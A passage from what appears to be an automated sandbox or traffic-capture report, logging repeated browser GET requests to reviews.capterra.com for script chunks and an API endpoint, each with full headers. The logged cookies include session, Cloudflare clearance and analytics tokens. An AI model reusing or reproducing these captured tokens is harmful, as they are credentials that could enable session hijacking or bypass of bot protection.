OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-b2dc317f7f6b4c6b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5430-253c90c823f8668d.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-fb999dd119b6be4b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/779-e50b3615e84c36b9.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/847-853074d4dea368fa.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/products-search-269c80371465c95a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-7ff3395b5b239e11.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6310-a55b4917884e40ce.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_ssgManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/630-a3c3b2c58b5440d6.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /api/v1/categories/targets?lang=en HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"traceparent: 00-00000000000000001887aea06bca0fdb-0234aca828d75b08-01sec-ch-ua-mobile: ?0x-gdm-source-site: Capterrax-datadog-origin: rumUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36x-datadog-sampling-priority: 1Accept: application/json, text/plain, */*x-datadog-trace-id: 1767573382792613851x-datadog-parent-id: 158941725104495368sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5430-253c90c823f8668d.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; 